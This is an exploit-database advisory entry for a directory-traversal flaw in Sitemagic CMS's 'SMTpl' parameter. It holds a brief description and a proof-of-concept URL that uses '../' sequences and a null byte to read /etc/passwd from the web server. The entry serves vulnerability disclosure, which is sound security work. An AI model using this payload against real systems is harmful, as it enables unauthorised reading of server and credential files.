Sitemagic CMS - 'SMTpl' Directory Traversal

EDB-ID:

35877

CVE:

N/A




Platform:

PHP

Date:

2011-06-23


source: https://www.securityfocus.com/bid/48399/info

Sitemagic CMS is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain arbitrary local files in the context of the webserver process. 

http://www.example.com/smcmsdemoint/index.php?SMTpl=../../../../../../../../../../etc/passwd%00.png